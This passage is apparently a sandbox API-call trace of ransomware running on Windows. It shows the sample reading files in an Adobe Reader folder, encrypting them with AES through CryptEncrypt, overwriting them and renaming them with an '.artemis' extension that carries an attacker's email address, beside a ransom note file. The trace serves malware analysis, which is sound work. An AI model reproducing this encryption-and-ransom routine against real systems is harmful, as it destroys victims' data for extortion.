lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", nBufferLength=0x105, lpBuffer=0x6cee7e8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", lpFilePart=0x0) returned 0x32 [0202.066] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6cee7e8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x5d [0202.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceec48) returned 1 [0202.066] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm"), fInfoLevelId=0x0, lpFileInformation=0x6ceecc4 | out: lpFileInformation=0x6ceecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x1ece0b00, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x4450)) returned 1 [0202.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceec44) returned 1 [0202.066] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0202.067] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", nBufferLength=0x105, lpBuffer=0x6cee88c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", lpFilePart=0x0) returned 0x34 [0202.067] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", nBufferLength=0x105, lpBuffer=0x6cee884, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", lpFilePart=0x0) returned 0x34 [0202.067] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6cee88c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0202.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceecec) returned 1 [0202.067] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6ceed68 | out: lpFileInformation=0x6ceed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x109b3760, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x109b3760, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x109b3760, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0202.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceece8) returned 1 [0202.068] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", nBufferLength=0x105, lpBuffer=0x6cee808, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", lpFilePart=0x0) returned 0x34 [0202.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceecb4) returned 1 [0202.068] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm"), fInfoLevelId=0x0, lpFileInformation=0x3536050 | out: lpFileInformation=0x3536050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41e3)) returned 1 [0202.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceecb0) returned 1 [0202.096] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", nBufferLength=0x105, lpBuffer=0x6cee6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", lpFilePart=0x0) returned 0x34 [0202.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceebe8) returned 1 [0202.096] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a8 [0202.097] GetFileType (hFile=0x5a8) returned 0x1 [0202.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceebe4) returned 1 [0202.097] GetFileType (hFile=0x5a8) returned 0x1 [0202.097] GetFileSize (in: hFile=0x5a8, lpFileSizeHigh=0x6ceecf0 | out: lpFileSizeHigh=0x6ceecf0*=0x0) returned 0x41e3 [0202.097] ReadFile (in: hFile=0x5a8, lpBuffer=0x354486c, nNumberOfBytesToRead=0x41e3, lpNumberOfBytesRead=0x6ceec9c, lpOverlapped=0x0 | out: lpBuffer=0x354486c*, lpNumberOfBytesRead=0x6ceec9c*=0x41e3, lpOverlapped=0x0) returned 1 [0202.141] CloseHandle (hObject=0x5a8) returned 1 [0202.142] CryptAcquireContextW (in: phProv=0x6ceec3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ceec3c*=0x7a9310) returned 1 [0202.143] CryptGenRandom (in: hProv=0x7a9310, dwLen=0x10, pbBuffer=0x354cdb0 | out: pbBuffer=0x354cdb0) returned 1 [0202.840] CryptImportKey (in: hProv=0x7a9310, pbData=0x35b1d0c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6ceec0c | out: phKey=0x6ceec0c*=0x77b430) returned 1 [0202.841] CryptContextAddRef (hProv=0x7a9310, pdwReserved=0x0, dwFlags=0x0) returned 1 [0202.841] CryptContextAddRef (hProv=0x7a9310, pdwReserved=0x0, dwFlags=0x0) returned 1 [0202.841] CryptDuplicateKey (in: hKey=0x77b430, pdwReserved=0x0, dwFlags=0x0, phKey=0x6ceebfc | out: phKey=0x6ceebfc*=0x77ad30) returned 1 [0202.841] CryptContextAddRef (hProv=0x7a9310, pdwReserved=0x0, dwFlags=0x0) returned 1 [0202.841] CryptSetKeyParam (hKey=0x77ad30, dwParam=0x4, pbData=0x35b1dec*=0x1, dwFlags=0x0) returned 1 [0202.841] CryptSetKeyParam (hKey=0x77ad30, dwParam=0x1, pbData=0x35b1db8, dwFlags=0x0) returned 1 [0202.841] CryptEncrypt (in: hKey=0x77ad30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x35b1dfc*, pdwDataLen=0x6ceec68*=0x41f0, dwBufLen=0x41f0 | out: pbData=0x35b1dfc*, pdwDataLen=0x6ceec68*=0x41f0) returned 1 [0202.841] CryptEncrypt (in: hKey=0x77ad30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35b6010*, pdwDataLen=0x6ceec70*=0x0, dwBufLen=0x10 | out: pbData=0x35b6010*, pdwDataLen=0x6ceec70*=0x10) returned 1 [0202.843] CryptDestroyKey (hKey=0x77b430) returned 1 [0202.843] CryptReleaseContext (hProv=0x7a9310, dwFlags=0x0) returned 1 [0202.843] CryptReleaseContext (hProv=0x7a9310, dwFlags=0x0) returned 1 [0202.843] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", nBufferLength=0x105, lpBuffer=0x6cee6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", lpFilePart=0x0) returned 0x34 [0202.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceebd4) returned 1 [0202.843] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a4 [0203.175] GetFileType (hFile=0x5a4) returned 0x1 [0203.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceebd0) returned 1 [0203.175] GetFileType (hFile=0x5a4) returned 0x1 [0203.175] WriteFile (in: hFile=0x5a4, lpBuffer=0x33f5404*, nNumberOfBytesToWrite=0x4400, lpNumberOfBytesWritten=0x6ceec90, lpOverlapped=0x0 | out: lpBuffer=0x33f5404*, lpNumberOfBytesWritten=0x6ceec90*=0x4400, lpOverlapped=0x0) returned 1 [0203.176] CloseHandle (hObject=0x5a4) returned 1 [0203.183] CoTaskMemAlloc (cb=0x20c) returned 0x9825530 [0203.183] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9825530 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0203.183] CoTaskMemFree (pv=0x9825530) [0203.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6cee6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.184] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceec10 | out: ppv=0x6ceec10*=0x72015c) returned 0x0 [0203.184] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceec08 | out: pAptType=0x6ceec08*=1) returned 0x0 [0203.184] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceec0c | out: ppvObject=0x6ceec0c*=0x0) returned 0x80004002 [0203.184] IUnknown:Release (This=0x72015c) returned 0x1 [0203.185] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee578 | out: ppv=0x6cee578*=0x6736e68) returned 0x0 [0203.185] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee790 | out: ppvObject=0x6cee790*=0x0) returned 0x80004002 [0203.185] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e68, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee7a4 | out: ppvObject=0x6cee7a4*=0x6738af0) returned 0x0 [0203.185] WbemDefPath:IUnknown:Release (This=0x6736e68) returned 0x0 [0203.185] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee3c4 | out: ppvObject=0x6cee3c4*=0x6738af0) returned 0x0 [0203.185] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee380 | out: ppvObject=0x6cee380*=0x0) returned 0x80004002 [0203.185] WbemDefPath:IUnknown:AddRef (This=0x6738af0) returned 0x3 [0203.185] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedcdc | out: ppvObject=0x6cedcdc*=0x0) returned 0x80004002 [0203.185] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedc8c | out: ppvObject=0x6cedc8c*=0x0) returned 0x80004002 [0203.186] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedc98 | out: ppvObject=0x6cedc98*=0x77c188) returned 0x0 [0203.186] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c188, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedca0 | out: pCid=0x6cedca0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0203.186] WbemDefPath:IUnknown:Release (This=0x77c188) returned 0x3 [0203.186] CoGetContextToken (in: pToken=0x6cedcf8 | out: pToken=0x6cedcf8) returned 0x0 [0203.186] CoGetContextToken (in: pToken=0x6cee100 | out: pToken=0x6cee100) returned 0x0 [0203.186] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee190 | out: ppvObject=0x6cee190*=0x0) returned 0x80004002 [0203.186] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x2 [0203.186] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x1 [0203.186] CoGetContextToken (in: pToken=0x6ceea88 | out: pToken=0x6ceea88) returned 0x0 [0203.186] CoGetContextToken (in: pToken=0x6cee9e8 | out: pToken=0x6cee9e8) returned 0x0 [0203.186] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x6ceeab8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ceeab4 | out: ppvObject=0x6ceeab4*=0x6738af0) returned 0x0 [0203.186] WbemDefPath:IUnknown:AddRef (This=0x6738af0) returned 0x3 [0203.186] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x2 [0203.186] WbemDefPath:IWbemPath:SetText (This=0x6738af0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0203.186] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x6ceec3c | out: puCount=0x6ceec3c*=0x0) returned 0x0 [0203.186] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6ceec38*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec38*=0x20, pszText=0x0) returned 0x0 [0203.186] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6ceec38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0203.186] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738af0, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0203.186] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x6ceec3c | out: puCount=0x6ceec3c*=0x0) returned 0x0 [0203.186] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738af0, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0203.187] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738af0, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0203.187] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x6ceebbc | out: puCount=0x6ceebbc*=0x0) returned 0x0 [0203.187] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6ceeba8 | out: puCount=0x6ceeba8*=0x2) returned 0x0 [0203.187] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceeba4*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeba4*=0xf, pszText=0x0) returned 0x0 [0203.187] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceeba4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeba4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.187] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceeb58 | out: ppv=0x6ceeb58*=0x72015c) returned 0x0 [0203.187] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceeb50 | out: pAptType=0x6ceeb50*=1) returned 0x0 [0203.187] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceeb54 | out: ppvObject=0x6ceeb54*=0x0) returned 0x80004002 [0203.187] IUnknown:Release (This=0x72015c) returned 0x1 [0203.188] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee4c0 | out: ppv=0x6cee4c0*=0x6736e88) returned 0x0 [0203.188] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e88, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee6d8 | out: ppvObject=0x6cee6d8*=0x0) returned 0x80004002 [0203.188] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e88, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee6ec | out: ppvObject=0x6cee6ec*=0x6738620) returned 0x0 [0203.188] WbemDefPath:IUnknown:Release (This=0x6736e88) returned 0x0 [0203.188] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee30c | out: ppvObject=0x6cee30c*=0x6738620) returned 0x0 [0203.188] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee2c8 | out: ppvObject=0x6cee2c8*=0x0) returned 0x80004002 [0203.188] WbemDefPath:IUnknown:AddRef (This=0x6738620) returned 0x3 [0203.188] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedc24 | out: ppvObject=0x6cedc24*=0x0) returned 0x80004002 [0203.188] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedbd4 | out: ppvObject=0x6cedbd4*=0x0) returned 0x80004002 [0203.188] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedbe0 | out: ppvObject=0x6cedbe0*=0x77bff8) returned 0x0 [0203.189] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77bff8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedbe8 | out: pCid=0x6cedbe8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0203.189] WbemDefPath:IUnknown:Release (This=0x77bff8) returned 0x3 [0203.189] CoGetContextToken (in: pToken=0x6cedc40 | out: pToken=0x6cedc40) returned 0x0 [0203.189] CoGetContextToken (in: pToken=0x6cee048 | out: pToken=0x6cee048) returned 0x0 [0203.189] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee0d8 | out: ppvObject=0x6cee0d8*=0x0) returned 0x80004002 [0203.189] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x2 [0203.189] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x1 [0203.189] CoGetContextToken (in: pToken=0x6cee9d0 | out: pToken=0x6cee9d0) returned 0x0 [0203.189] CoGetContextToken (in: pToken=0x6cee930 | out: pToken=0x6cee930) returned 0x0 [0203.189] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x6ceea00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6cee9fc | out: ppvObject=0x6cee9fc*=0x6738620) returned 0x0 [0203.189] WbemDefPath:IUnknown:AddRef (This=0x6738620) returned 0x3 [0203.189] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x2 [0203.189] WbemDefPath:IWbemPath:SetText (This=0x6738620, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0203.189] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x6ceeb80 | out: puCount=0x6ceeb80*=0x2) returned 0x0 [0203.189] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x6ceeb7c*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeb7c*=0xf, pszText=0x0) returned 0x0 [0203.189] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x6ceeb7c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeb7c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.189] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceeb80 | out: ppv=0x6ceeb80*=0x72015c) returned 0x0 [0203.189] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceeb78 | out: pAptType=0x6ceeb78*=1) returned 0x0 [0203.189] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceeb7c | out: ppvObject=0x6ceeb7c*=0x0) returned 0x80004002 [0203.189] IUnknown:Release (This=0x72015c) returned 0x1 [0203.190] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee7a0 | out: ppv=0x6cee7a0*=0x672f3d0) returned 0x0 [0203.190] WbemLocator:IUnknown:QueryInterface (in: This=0x672f3d0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee9b8 | out: ppvObject=0x6cee9b8*=0x0) returned 0x80004002 [0203.190] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f3d0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee9cc | out: ppvObject=0x6cee9cc*=0x67370e8) returned 0x0 [0203.190] WbemLocator:IUnknown:Release (This=0x672f3d0) returned 0x0 [0203.190] WbemLocator:IUnknown:QueryInterface (in: This=0x67370e8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, 